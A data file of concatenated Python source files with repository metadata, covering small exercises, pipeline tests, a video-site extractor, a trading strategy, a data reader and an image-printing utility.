3fb5e7917f3a7f42b3b3e6a4fe1551923b895957 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/302/69507/submittedfiles/testes.py | 41b941ca1b9f17291580bab0acaa2052cb564863 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | n = float(input('Digite o número de lados do polígono'))
if n<=2:
print('Isso não é um polígono')
elif n>2:
nd = ((n*(n-3))/2)
print (nd)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
aeea0b4cae09144645d7594a809090b801476613 | ff0cdf438fbc202fe621ed90472ce9d93acd383b | /make_pdf/make_pptx.py | 5251fe6e6c2bf2f5c3f305315d2c331c53d5a3b9 | [
"MIT",
"Apache-2.0"
] | permissive | nishio/idea-generation | e0284f34ebb163660f6b5d45963a8528f4eb3cb4 | 7d7fa08456243dc63c9c80d15244f39b73814ad9 | refs/heads/master | 2021-11-10T08:33:13.597884 | 2021-10-24T03:51:12 | 2021-10-24T03:51:12 | 12,247,640 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
テキストをpptxにする
改行位置制御や図を貼りたいなどの細かいニーズに答えるのは
ユーザの手元のPowerPointでやってもらおうという発想
"""
import argparse
from pptx import Presentation
from pptx.util import Inches, Pt, Cm
from pptx.enum.text import MSO_AUTO_SIZE, PP_ALIGN, MSO_ANCHOR
def main():
parser = argparse.ArgumentParser(description='Text to PPTX.')
parser.add_argument('--test', action='store_true')
args = parser.parse_args()
if args.test:
texts = ['あ' * x for x in range(1, 101)]
else:
import sys
texts = sys.stdin.read().split('\n')
make_pptx(texts)
def find_best_fontsize(text):
sizes = [415, 415, 346, 240]
chars = len(text.decode('utf-8').encode('sjis')) / 2
if chars < len(sizes):
return sizes[chars]
# means 'if chars leq 6 (2 * 3), fontsize is 200pt'
sizes = [
(2 * 3, 200), (2 * 4, 167), (3 * 4, 159),
(3 * 5, 125), (4 * 6, 110), (5 * 8, 90),
(5 * 9, 80), (6 * 10, 70), (7 * 14, 60),
]
for lim, siz in sizes:
if chars <= lim:
return siz
return 50
def make_pptx(texts):
prs = Presentation()
for text in texts:
blank_slide_layout = prs.slide_layouts[6]
slide = prs.slides.add_slide(blank_slide_layout)
txBox = slide.shapes.add_textbox(0, 0, Cm(25.4), Cm(19.1))
tf = txBox.textframe
tf.auto_size = MSO_AUTO_SIZE.TEXT_TO_FIT_SHAPE
tf.word_wrap = True
tf.vertical_anchor = MSO_ANCHOR.MIDDLE
p = tf.paragraphs[0]
p.text = text
p.font.size = Pt(find_best_fontsize(text))
p.alignment = PP_ALIGN.CENTER
prs.save('test.pptx')
if __name__ == '__main__':
main()
| [
"nishio.hirokazu@gmail.com"
] | nishio.hirokazu@gmail.com |
6d57d337bb381af4b0baadbe7ffb9536a14c12ee | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/89f5b02f9e63478881ea0f0106bf295d.py | aefb9d4b1561027d8513e1650a48c28554dd61ce | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 457 | py | import string
def hey(input_text):
if is_all_caps(input_text):
return "Woah, chill out!"
if is_question(input_text):
return "Sure."
if is_empty(input_text):
return "Fine. Be that way!"
return "Whatever."
def is_question(input_text):
return input_text.endswith("?")
def is_empty(input_text):
return string.strip(input_text) == ''
def is_all_caps(input_text):
return input_text.isupper()
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
1c5b53877ed351ea56b9e794d857dd6c10d9c66c | 76dcba11031090ac69dee281ef18ae98cdd43ff9 | /IssueTrackerProduct/I18N.py | ba3cc3b59a2ebd0d8f45b768dd3c33b82cdab7ce | [] | no_license | sureshvv/IssueTrackerProduct | 137b34a3123ea8823af18aa9c0161dad840b93da | 817820377288330f9e318428cd743659476e625d | refs/heads/master | 2021-01-18T11:22:46.844607 | 2014-04-21T17:15:58 | 2014-04-21T17:15:58 | 1,546,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | #try:
# from Products.PlacelessTranslationService.MessageID import MessageIDFactory
# _ = MessageIDFactory('itp')
#except ImportError:
# def _(s):
# return s
def _(s, *a, **k):
return s | [
"mail@peterbe.com"
] | mail@peterbe.com |
59682c24e6d34e0adc8df231f18c615f80f35d74 | 6d1016e97e02343b8d85ddbd5f5d1406261eabfd | /test/view_helpers/Test_DataTable_Js_Views.py | a4659e5a5f0be0edb2d6aa97169f679f20c61858 | [
"Apache-2.0"
] | permissive | MaeveScarryPBX/serverless-render | 1c2c2dbf228e5fb69d67d7acd89bf5a49fc69087 | 44365e7e0ab6e04fb304a7091ceeab41f67d8d88 | refs/heads/master | 2020-04-29T05:05:47.078806 | 2019-03-14T21:29:12 | 2019-03-14T21:29:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,527 | py | from unittest import TestCase
from browser.Browser_Lamdba_Helper import Browser_Lamdba_Helper
from view_helpers.DataTable_Js_Views import DataTable_Js_Views
class Test_DataTable_Js_Views(TestCase):
def setUp(self):
self.graph_name = 'graph_XKW'
self.png_data = None
def tearDown(self):
Browser_Lamdba_Helper().save_png_data(self.png_data)
def test_graph(self):
graph_name = 'graph_XKW' # (7 nodes)
graph_name = 'graph_MKF' # ( 20 nodes, 27 edges)
#graph_name = 'graph_YT4' # (199 nodes, 236 edges)
#graph_name = 'graph_VZ5' # (367 nodes, 653 edges)
graph_name = 'graph_W4T' # R1 Labels (from search results)
graph_name = 'graph_9CP'
self.png_data = DataTable_Js_Views.graph(params=[graph_name])
def test_graph_all_fields(self):
graph_name = 'graph_XKW' # (7 nodes)
#graph_name = 'graph_MKF' # ( 20 nodes, 27 edges)
#graph_name = 'graph_YT4' # (199 nodes, 236 edges)
#graph_name = 'graph_VZ5' # (367 nodes, 653 edges)
self.png_data = DataTable_Js_Views.graph_all_fields(params=[graph_name])
def graph_all_fields__issue_id(self):
graph_name = 'GSSP-111'
self.png_data = DataTable_Js_Views.graph_all_fields(params=[graph_name])
def test_issue(self):
issue_id = 'GSSP-111'
self.png_data = DataTable_Js_Views.issue(params=[issue_id])
def test_test_data(self):
self.png_data = DataTable_Js_Views.test_data() | [
"dinis.cruz@owasp.org"
] | dinis.cruz@owasp.org |
6a9b86aef458d8da67395ff229fdfb3f7fb9988e | c7e753eff114ea692057c406ff9ce2fe8a7c1adb | /tests/test_cmd.py | 931cbd54d7684c775e23d66ca5048858c5825b63 | [] | permissive | LSSTDESC/ceci | 67fa0df56dde8c61947e5d8c2a20796beaeeb422 | 5c683f8fd6a8bdd2b36c1f6f03f4d24599307a54 | refs/heads/master | 2023-09-01T08:05:04.830316 | 2023-08-02T12:47:49 | 2023-08-02T12:47:49 | 120,935,349 | 9 | 10 | BSD-3-Clause | 2023-08-23T12:46:07 | 2018-02-09T17:29:45 | Python | UTF-8 | Python | false | false | 3,158 | py | from ceci.pipeline import StageExecutionConfig
from ceci.sites.local import LocalSite
from ceci.sites.nersc import NerscBatchSite
import os
import pytest
class MockSite:
def __init__(self):
self.config = {"image": "abc", "volume": "def"}
def test_defaults():
sec = StageExecutionConfig({"name": "a", "site": MockSite()})
assert sec.nodes == 1
assert sec.nprocess == 1
assert sec.threads_per_process == 1
assert sec.mem_per_process == 2
assert sec.image == "abc"
assert sec.volume == "def"
def test_local():
site = LocalSite({})
sec = StageExecutionConfig({"name": "a", "site": site})
cmd1 = "echo 1"
# should not start with docker/shifter, since no image specified
cmd = site.command(cmd1, sec)
# don't want to test too specifically here, since it may change
assert "docker" not in cmd
assert "shifter" not in cmd
assert "OMP_NUM_THREADS=1" in cmd
assert cmd1 in cmd
def test_docker():
site = LocalSite({})
sec = StageExecutionConfig(
{
"name": "a",
"site": site,
"image": "username/potato",
"volume": "a:b",
"threads_per_process": 4,
"nprocess": 2,
}
)
cmd1 = "echo 1"
# should not start with docker/shifter, since no image specified
cmd = site.command(cmd1, sec)
# don't want to test too specifically here, since it may change
assert "docker run" in cmd
assert "username/potato" in cmd
assert "-v a:b" in cmd
assert "mpirun -n 2" in cmd
assert "shifter" not in cmd
assert "OMP_NUM_THREADS=4" in cmd
assert cmd1 in cmd
def _test_nersc(job_id):
site = NerscBatchSite({})
# fake that we're runnng a job to avoid complaints
initial = os.environ.get("SLURM_JOB_ID")
if job_id:
os.environ["SLURM_JOB_ID"] = "fake_job_id"
elif initial is not None:
del os.environ["SLURM_JOB_ID"]
try:
sec = StageExecutionConfig(
{
"name": "a",
"site": site,
"image": "username/potato",
"volume": "a:b",
"threads_per_process": 4,
"nprocess": 2,
"nodes": 3,
}
)
cmd1 = "echo 1"
# should not start with docker/shifter, since no image specified
cmd = site.command(cmd1, sec)
# don't want to test too specifically here, since it may change
assert "shifter" in cmd
assert "--image username/potato" in cmd
assert "-V a:b" in cmd
assert "srun -u -n 2" in cmd
assert "--env OMP_NUM_THREADS=4" in cmd
assert "--nodes 3" in cmd
assert "--mpi" in cmd
assert cmd1 in cmd
finally:
if job_id:
if initial is None:
del os.environ["SLURM_JOB_ID"]
else:
os.environ["SLURM_JOB_ID"] = initial
elif initial is not None:
os.environ["SLURM_JOB_ID"] = initial
def test_works():
_test_nersc(True)
def test_warning():
with pytest.raises(ValueError):
_test_nersc(False)
| [
"joezuntz@googlemail.com"
] | joezuntz@googlemail.com |
e545de69bc868a2bb6cdfebd2ab53a87e2dbcdc5 | 8d35b8aa63f3cae4e885e3c081f41235d2a8f61f | /discord/ext/dl/extractor/performgroup.py | 553b2b6e861bedeaababf7888ba0a15b779f4d71 | [
"MIT"
] | permissive | alexyy802/Texus | 1255f4e54c8d3cc067f0d30daff1cf24932ea0c9 | c282a836f43dfd588d89d5c13f432896aebb540f | refs/heads/master | 2023-09-05T06:14:36.217601 | 2021-11-21T03:39:55 | 2021-11-21T03:39:55 | 429,390,575 | 0 | 0 | MIT | 2021-11-19T09:22:22 | 2021-11-18T10:43:11 | Python | UTF-8 | Python | false | false | 3,674 | py | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import int_or_none
class PerformGroupIE(InfoExtractor):
_VALID_URL = r"https?://player\.performgroup\.com/eplayer(?:/eplayer\.html|\.js)#/?(?P<id>[0-9a-f]{26})\.(?P<auth_token>[0-9a-z]{26})"
_TESTS = [
{
# http://www.faz.net/aktuell/sport/fussball/wm-2018-playoffs-schweiz-besiegt-nordirland-1-0-15286104.html
"url": "http://player.performgroup.com/eplayer/eplayer.html#d478c41c5d192f56b9aa859de8.1w4crrej5w14e1ed4s1ce4ykab",
"md5": "259cb03d142e2e52471e8837ecacb29f",
"info_dict": {
"id": "xgrwobuzumes1lwjxtcdpwgxd",
"ext": "mp4",
"title": "Liga MX: Keine Einsicht nach Horrorfoul",
"description": "md5:7cd3b459c82725b021e046ab10bf1c5b",
"timestamp": 1511533477,
"upload_date": "20171124",
},
}
]
def _call_api(self, service, auth_token, content_id, referer_url):
return self._download_json(
"http://ep3.performfeeds.com/ep%s/%s/%s/"
% (service, auth_token, content_id),
content_id,
headers={
"Referer": referer_url,
"Origin": "http://player.performgroup.com",
},
query={
"_fmt": "json",
},
)
def _real_extract(self, url):
player_id, auth_token = re.search(self._VALID_URL, url).groups()
bootstrap = self._call_api("bootstrap", auth_token, player_id, url)
video = bootstrap["config"]["dataSource"]["sourceItems"][0]["videos"][0]
video_id = video["uuid"]
vod = self._call_api("vod", auth_token, video_id, url)
media = vod["videos"]["video"][0]["media"]
formats = []
hls_url = media.get("hls", {}).get("url")
if hls_url:
formats.extend(
self._extract_m3u8_formats(
hls_url, video_id, "mp4", "m3u8_native", m3u8_id="hls", fatal=False
)
)
hds_url = media.get("hds", {}).get("url")
if hds_url:
formats.extend(
self._extract_f4m_formats(
hds_url + "?hdcore", video_id, f4m_id="hds", fatal=False
)
)
for c in media.get("content", []):
c_url = c.get("url")
if not c_url:
continue
tbr = int_or_none(c.get("bitrate"), 1000)
format_id = "http"
if tbr:
format_id += "-%d" % tbr
formats.append(
{
"format_id": format_id,
"url": c_url,
"tbr": tbr,
"width": int_or_none(c.get("width")),
"height": int_or_none(c.get("height")),
"filesize": int_or_none(c.get("fileSize")),
"vcodec": c.get("type"),
"fps": int_or_none(c.get("videoFrameRate")),
"vbr": int_or_none(c.get("videoRate"), 1000),
"abr": int_or_none(c.get("audioRate"), 1000),
}
)
self._sort_formats(formats)
return {
"id": video_id,
"title": video["title"],
"description": video.get("description"),
"thumbnail": video.get("poster"),
"duration": int_or_none(video.get("duration")),
"timestamp": int_or_none(video.get("publishedTime"), 1000),
"formats": formats,
}
| [
"noreply@github.com"
] | alexyy802.noreply@github.com |
549c3d80595c7be7ec9706b113796272180aa681 | b242c102f50ded2fee0cc6ac6aea442a1b6792cb | /strategy/65_8只基金按PE调仓.py | f5e4523c7a6542df7ee6f4aba6ead2c1ffa43860 | [] | no_license | VIRGIL-YAN/woquant | 2c0811ed743d217b2ec478988ce0808838f1177a | ac5437e0eed552aa9b3015d1ace647c9a492f97d | refs/heads/master | 2023-04-16T17:23:05.754846 | 2021-04-30T08:58:10 | 2021-04-30T08:58:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,036 | py | 该策略由聚宽用户分享,仅供学习交流使用。
原文网址:https://www.joinquant.com/post/11700
原文一般包含策略说明,如有疑问建议到原文和作者交流讨论。
原文策略源码如下:
# 标题:低回撤,PE分仓
# 作者:桑梓
#自定义数据是股指ETF占的仓位
from __future__ import division
import numpy as np
import pandas as pd
import bisect
def initialize(context):
g.flag = False
run_monthly(monthly, 1, time='open')
set_benchmark('000300.XSHG')
#g.CN10y_bond=0.03
log.set_level('order', 'error')
g.HoldLevel=0
g.LastHoldLevel=0
g.HoldLevel1=0
g.HoldLevel2=0.2
g.HoldLevel3=0.4
g.HoldLevel4=0.6
g.HoldLevel5=0.75
g.HoldLevel6=0.9
#创建8个独立的仓位
init_cash = context.portfolio.starting_cash #获取初始资金
init_cash = context.portfolio.starting_cash/8 #将初始资金等分为10份
set_subportfolios([SubPortfolioConfig(cash=init_cash, type='stock'),\
SubPortfolioConfig(cash=init_cash, type='stock'),\
SubPortfolioConfig(cash=init_cash, type='stock'),\
SubPortfolioConfig(cash=init_cash, type='stock'),\
SubPortfolioConfig(cash=init_cash, type='stock'),\
SubPortfolioConfig(cash=init_cash, type='stock'),\
SubPortfolioConfig(cash=init_cash, type='stock'),\
SubPortfolioConfig(cash=init_cash, type='stock')])
g.stocks = {
'hs300':['000300.XSHG','510300.XSHG',context.subportfolios[0],0,14.10,44.42],
'zzhb':['000827.XSHG','512580.XSHG',context.subportfolios[1],1,26.78,72.29], #中证保
'zz500':['000905.XSHG','510510.XSHG',context.subportfolios[2],2,21.99,69.81], #中证500
'hlzz':['000015.XSHG','510880.XSHG',context.subportfolios[3],3,8.40,46.23], #红利指数
'cyb':['399006.XSHE','159915.XSHE',context.subportfolios[4],4,27.61,121.85], #创业板
'zztmt':['000998.XSHG','150203.XSHE',context.subportfolios[5],5,28.15,108.92], #tmt
'yy':['000933.XSHG','512010.XSHG',context.subportfolios[6],6,22.22,66.82], #医药
'zz100':['000903.XSHG','150012.XSHE',context.subportfolios[7],7,9.81,36.59] #中证100
}
def monthly(context):
g.flag = True
def Relation(n,MaxRatio,MinRatio):
if n>=MaxRatio*0.9+MinRatio:
HoldLevel=g.HoldLevel1
elif n>MaxRatio*0.8+MinRatio:
HoldLevel=g.HoldLevel2
elif n>MaxRatio*0.7+MinRatio:
HoldLevel=g.HoldLevel3
elif n>MaxRatio*0.6+MinRatio:
HoldLevel=g.HoldLevel4
elif n>MaxRatio*0.5+MinRatio:
HoldLevel=g.HoldLevel5
elif n>MaxRatio*0.3+MinRatio: #16.92 0.4=19.36
HoldLevel=g.HoldLevel6
else:
HoldLevel=1
return HoldLevel
#else:
# k=(g.MinHoldLevel-g.MaxHoldLevel)/(g.MaxRatio-g.MinRatio)
# b=g.MinHoldLevel-g.MinRatio*k
# g.HoldLevel=k*n+b
#Debug:
#print 'k=(' +str(g.MaxHoldLevel)+'-'+str(g.MinHoldLevel) + ')/' +\
#'('+str(g.MaxRatio)+'-'+str(g.MinRatio)+')'+' = '+str(k)
#print 'HoldLevel=' +str(k) + '*N' + '+' +str(b)
def PeRatio(code,context): # 计算当前指数PE
date = context.current_dt
stocks = get_index_stocks(code, date)
q = query(valuation).filter(valuation.code.in_(stocks))
df = get_fundamentals(q, date)
if len(df)>0:
pe2 = len(df)/sum([1/p if p>0 else 0 for p in df.pe_ratio])
return pe2
else:
return float('NaN')
#def ChangeHoldLevel(stock,NewHoldLevel,context):
# order_target_value(g.stocks[stock][1],NewHoldLevel*g.stocks[stock][2],pindex=g.stocks[stock][3])
#order_target_value(g.Test_bond,(1-NewHoldLevel)*AllMoney,None)
def handle_data(context, data):
#if context.current_dt.isoweekday()!=1: #ne Marcher que Lundi.
# return
#N= (1/PeRatio(get_current_data()))/g.CN10y_bond
if g.flag == True:
for stock in g.stocks:
index_pe = PeRatio(g.stocks[stock][0],context)
MaxRatio1 = g.stocks[stock][5]
MinRatio = g.stocks[stock][4]
MaxRatio = MaxRatio1-MinRatio
HoldLevel = Relation(index_pe,MaxRatio,MinRatio)
trade_code = g.stocks[stock][1]
cash = g.stocks[stock][2].total_value * HoldLevel
inde = g.stocks[stock][3]
order_target_value(trade_code,cash,pindex=inde)
g.flag = False
'''
N = PeRatio(code,context)
HoldLevel = Relation(N)
ChangeHoldLevel(HoldLevel,context.portfolio.total_value)
print 'PE:%.2f'%N
print "Holdlevel is %.2f" % HoldLevel
record(name=g.HoldLevel)
''' | [
"28278672@qq.com"
] | 28278672@qq.com |
5a178504701103cd6061e28c6f5cff59ceab7594 | 1625edfe28b4b0979fd32b4a3c5e55249a993fd5 | /baekjoon6378.py | 8ce2953ef95739ba3df687df8eebc76b9b14c075 | [] | no_license | beOk91/baekjoon2 | b8bf504c506c6278899d4107ecfe51974ef13f5e | 39569f8effb8e32405a7d74d98bdabcab783ec56 | refs/heads/master | 2023-05-11T20:11:19.015113 | 2020-09-14T23:58:49 | 2020-09-14T23:58:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | while True:
a=input()
if a=="0":break
while True:
result=sum(int(i) for i in a)
a=str(result)
if int(a)<10:break
print(result) | [
"be_ok91@naver.com"
] | be_ok91@naver.com |
f2d1cdcbd86af861339970878e3c4bcecd5bf9df | c3132612a7ac311e501e432e1a4c7592bbd7a713 | /day09/code/07_迭代器&迭代器对象.py | 0f2533805b097e5b79005e0871676ac0381c71a2 | [] | no_license | everqiujuan/python | 7b8e169107012c3d7829d4ebd9860482fc0d8fec | b0a98de943217e24da60f79dec4fe8ebf4f1c713 | refs/heads/master | 2020-06-21T16:57:22.260311 | 2019-07-18T05:58:44 | 2019-07-18T05:58:44 | 184,990,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,326 | py |
from collections import Iterator # 迭代器
from collections import Iterable # 可迭代对象,迭代器对象
# 迭代器
# 迭代器对象:可以使用for-in循环遍历的
# 迭代器对象:可以使用for-in循环的
# list, tuple, dict, set, str, generator对象 都是迭代器对象
print(isinstance([1, 2], Iterable)) # True
print(isinstance((1, 2), Iterable)) # True
print(isinstance({}, Iterable)) # True
print(isinstance({1, 2}, Iterable)) # True
print(isinstance("hello", Iterable)) # True
print(isinstance((i for i in range(1,3)), Iterable)) # True
# 迭代器: 可以使用for-in遍历,且可以next()
print(isinstance([1, 2], Iterator)) # False
print(isinstance((1, 2), Iterator)) # False
print(isinstance({}, Iterator)) # False
print(isinstance({1, 2}, Iterator)) # False
print(isinstance("hello", Iterator)) # False
print(isinstance((i for i in range(1, 3)), Iterator)) # True
# iter: 可以将迭代器对象 转换成 迭代器
list1 = [11, 22, 33]
res = iter(list1)
# print(res) # <list_iterator object at 0x00000000027B7208>
# print(next(res)) # 11
# print(next(res)) # 22
# print(next(res)) # 33
# print(next(res)) # 报错
# list(): 将迭代器转换成列表迭代器对象
list2 = list(res)
print(list2) # [11, 22, 33]
| [
"1748636236@qq.com"
] | 1748636236@qq.com |
472b14b7674ba6998f913e051207c965ee2f4138 | 599bca7f41694112b1367854a81e0bd9162a6f7a | /2020SpringClass/学习笔记/201702064-zhousijia/6zhousijia201702064/code/MiniFramework/DataReader_2_0.py | 70736905f84cb84aac6cdcd6e66768d5c17f3b53 | [
"MIT"
] | permissive | XIAxuanzheFrancis/AIML | f625013a5010799681601cf25b7c4b103226dcc4 | 7e333fd65378c2cbaeedbeaa3560f30e8a341857 | refs/heads/master | 2023-01-19T17:29:45.156651 | 2020-11-29T15:35:52 | 2020-11-29T15:35:52 | 299,838,961 | 2 | 0 | MIT | 2020-09-30T07:16:30 | 2020-09-30T07:16:29 | null | UTF-8 | Python | false | false | 7,754 | py | # Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for full license information.
"""
Version 2.0
"""
import numpy as np
from pathlib import Path
from MiniFramework.EnumDef_3_0 import *
"""
X:
x1: feature1 feature2 feature3...
x2: feature1 feature2 feature3...
x3: feature1 feature2 feature3...
......
Y: [if regression, value]
[if binary classification, 0/1]
[if multiple classification, e.g. 4 category, one-hot]
"""
class DataReader_2_0(object):
def __init__(self, train_file, test_file):
self.train_file_name = train_file
self.test_file_name = test_file
self.num_train = 0 # num of training examples
self.num_test = 0 # num of test examples
self.num_validation = 0 # num of validation examples
self.num_feature = 0 # num of features
self.num_category = 0 # num of categories
self.XTrain = None # training feature set
self.YTrain = None # training label set
self.XTest = None # test feature set
self.YTest = None # test label set
self.XTrainRaw = None # training feature set before normalization
self.YTrainRaw = None # training label set before normalization
self.XTestRaw = None # test feature set before normalization
self.YTestRaw = None # test label set before normalization
self.XDev = None # validation feature set
self.YDev = None # validation lable set
# read data from file
def ReadData(self):
train_file = Path(self.train_file_name)
if train_file.exists():
data = np.load(self.train_file_name)
self.XTrainRaw = data["data"]
self.YTrainRaw = data["label"]
assert(self.XTrainRaw.shape[0] == self.YTrainRaw.shape[0])
self.num_train = self.XTrainRaw.shape[0]
self.num_feature = self.XTrainRaw.shape[1]
self.num_category = len(np.unique(self.YTrainRaw))
# this is for if no normalize requirment
self.XTrain = self.XTrainRaw
self.YTrain = self.YTrainRaw
else:
raise Exception("Cannot find train file!!!")
#end if
test_file = Path(self.test_file_name)
if test_file.exists():
data = np.load(self.test_file_name)
self.XTestRaw = data["data"]
self.YTestRaw = data["label"]
assert(self.XTestRaw.shape[0] == self.YTestRaw.shape[0])
self.num_test = self.XTestRaw.shape[0]
# this is for if no normalize requirment
self.XTest = self.XTestRaw
self.YTest = self.YTestRaw
# in case there has no validation set created
self.XDev = self.XTest
self.YDev = self.YTest
else:
raise Exception("Cannot find test file!!!")
#end if
# merge train/test data first, normalize, then split again
def NormalizeX(self):
x_merge = np.vstack((self.XTrainRaw, self.XTestRaw))
x_merge_norm = self.__NormalizeX(x_merge)
train_count = self.XTrainRaw.shape[0]
self.XTrain = x_merge_norm[0:train_count,:]
self.XTest = x_merge_norm[train_count:,:]
def __NormalizeX(self, raw_data):
temp_X = np.zeros_like(raw_data)
self.X_norm = np.zeros((2, self.num_feature))
# 按行归一化,即所有样本的同一特征值分别做归一化
for i in range(self.num_feature):
# get one feature from all examples
x = raw_data[:, i]
max_value = np.max(x)
min_value = np.min(x)
# min value
self.X_norm[0,i] = min_value
# range value
self.X_norm[1,i] = max_value - min_value
x_new = (x - self.X_norm[0,i]) / self.X_norm[1,i]
temp_X[:, i] = x_new
# end for
return temp_X
def NormalizeY(self, nettype, base=0):
if nettype == NetType.Fitting:
y_merge = np.vstack((self.YTrainRaw, self.YTestRaw))
y_merge_norm = self.__NormalizeY(y_merge)
train_count = self.YTrainRaw.shape[0]
self.YTrain = y_merge_norm[0:train_count,:]
self.YTest = y_merge_norm[train_count:,:]
elif nettype == NetType.BinaryClassifier:
self.YTrain = self.__ToZeroOne(self.YTrainRaw, base)
self.YTest = self.__ToZeroOne(self.YTestRaw, base)
elif nettype == NetType.MultipleClassifier:
self.YTrain = self.__ToOneHot(self.YTrainRaw, base)
self.YTest = self.__ToOneHot(self.YTestRaw, base)
def __NormalizeY(self, raw_data):
assert(raw_data.shape[1] == 1)
self.Y_norm = np.zeros((2,1))
max_value = np.max(raw_data)
min_value = np.min(raw_data)
# min value
self.Y_norm[0, 0] = min_value
# range value
self.Y_norm[1, 0] = max_value - min_value
y_new = (raw_data - min_value) / self.Y_norm[1, 0]
return y_new
def DeNormalizeY(self, predict_data):
real_value = predict_data * self.Y_norm[1,0] + self.Y_norm[0,0]
return real_value
def __ToOneHot(self, Y, base=0):
count = Y.shape[0]
temp_Y = np.zeros((count, self.num_category))
for i in range(count):
n = (int)(Y[i,0])
temp_Y[i,n-base] = 1
return temp_Y
# for binary classifier
# if use tanh function, need to set negative_value = -1
def __ToZeroOne(Y, positive_label=1, negative_label=0, positiva_value=1, negative_value=0):
temp_Y = np.zeros_like(Y)
for i in range():
if Y[i,0] == negative_label: # 负类的标签设为0
temp_Y[i,0] = negative_value
elif Y[i,0] == positive_label: # 正类的标签设为1
temp_Y[i,0] = positiva_value
# end if
# end for
return temp_Y
# normalize data by specified range and min_value
def NormalizePredicateData(self, X_predicate):
X_new = np.zeros(X_predicate.shape)
n_feature = X_predicate.shape[0]
for i in range(n_feature):
x = X_predicate[i,:]
X_new[i,:] = (x-self.X_norm[0,i])/self.X_norm[1,i]
return X_new
# need explicitly call this function to generate validation set
def GenerateValidationSet(self, k = 10):
self.num_validation = (int)(self.num_train / k)
self.num_train = self.num_train - self.num_validation
# validation set
self.XDev = self.XTrain[0:self.num_validation]
self.YDev = self.YTrain[0:self.num_validation]
# train set
self.XTrain = self.XTrain[self.num_validation:]
self.YTrain = self.YTrain[self.num_validation:]
def GetValidationSet(self):
return self.XDev, self.YDev
def GetTestSet(self):
return self.XTest, self.YTest
# 获得批样本数据
def GetBatchTrainSamples(self, batch_size, iteration):
start = iteration * batch_size
end = start + batch_size
batch_X = self.XTrain[start:end,:]
batch_Y = self.YTrain[start:end,:]
return batch_X, batch_Y
# permutation only affect along the first axis, so we need transpose the array first
# see the comment of this class to understand the data format
def Shuffle(self):
seed = np.random.randint(0,100)
np.random.seed(seed)
XP = np.random.permutation(self.XTrain)
np.random.seed(seed)
YP = np.random.permutation(self.YTrain)
self.XTrain = XP
self.YTrain = YP
| [
"gjy2poincare@users.noreply.github.com"
] | gjy2poincare@users.noreply.github.com |
2320023c2eb59c4ab96169508000ac9e65da1888 | fcfe929bc654e86a36ca4def29811ce09a86b0f2 | /bin/pilprint.py | de41bae68c007367dda9bc66b59cdbdac14d3d85 | [] | no_license | frclasso/trydjango19 | b3e12500acf116e2c705a3624bbcd6eaa08ca593 | e6f871121c2ec38bc3798752d96400a03287e071 | refs/heads/master | 2020-12-30T22:56:59.320974 | 2017-02-01T16:21:53 | 2017-02-01T16:21:53 | 80,637,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,660 | py | #!/Users/fabio/Estudo/Prog/Django/coding-for-entrepreneurs/trydjango19/bin/python
#
# The Python Imaging Library.
# $Id$
#
# print image files to postscript printer
#
# History:
# 0.1 1996-04-20 fl Created
# 0.2 1996-10-04 fl Use draft mode when converting.
# 0.3 2003-05-06 fl Fixed a typo or two.
#
from __future__ import print_function
import getopt
import os
import sys
import subprocess
VERSION = "pilprint 0.3/2003-05-05"
from PIL import Image
from PIL import PSDraw
letter = (1.0*72, 1.0*72, 7.5*72, 10.0*72)
def description(filepath, image):
title = os.path.splitext(os.path.split(filepath)[1])[0]
format = " (%dx%d "
if image.format:
format = " (" + image.format + " %dx%d "
return title + format % image.size + image.mode + ")"
if len(sys.argv) == 1:
print("PIL Print 0.3/2003-05-05 -- print image files")
print("Usage: pilprint files...")
print("Options:")
print(" -c colour printer (default is monochrome)")
print(" -d debug (show available drivers)")
print(" -p print via lpr (default is stdout)")
print(" -P <printer> same as -p but use given printer")
sys.exit(1)
try:
opt, argv = getopt.getopt(sys.argv[1:], "cdpP:")
except getopt.error as v:
print(v)
sys.exit(1)
printerArgs = [] # print to stdout
monochrome = 1 # reduce file size for most common case
for o, a in opt:
if o == "-d":
# debug: show available drivers
Image.init()
print(Image.ID)
sys.exit(1)
elif o == "-c":
# colour printer
monochrome = 0
elif o == "-p":
# default printer channel
printerArgs = ["lpr"]
elif o == "-P":
# printer channel
printerArgs = ["lpr", "-P%s" % a]
for filepath in argv:
try:
im = Image.open(filepath)
title = description(filepath, im)
if monochrome and im.mode not in ["1", "L"]:
im.draft("L", im.size)
im = im.convert("L")
if printerArgs:
p = subprocess.Popen(printerArgs, stdin=subprocess.PIPE)
fp = p.stdin
else:
fp = sys.stdout
ps = PSDraw.PSDraw(fp)
ps.begin_document()
ps.setfont("Helvetica-Narrow-Bold", 18)
ps.text((letter[0], letter[3]+24), title)
ps.setfont("Helvetica-Narrow-Bold", 8)
ps.text((letter[0], letter[1]-30), VERSION)
ps.image(letter, im)
ps.end_document()
if printerArgs:
fp.close()
except:
print("cannot print image", end=' ')
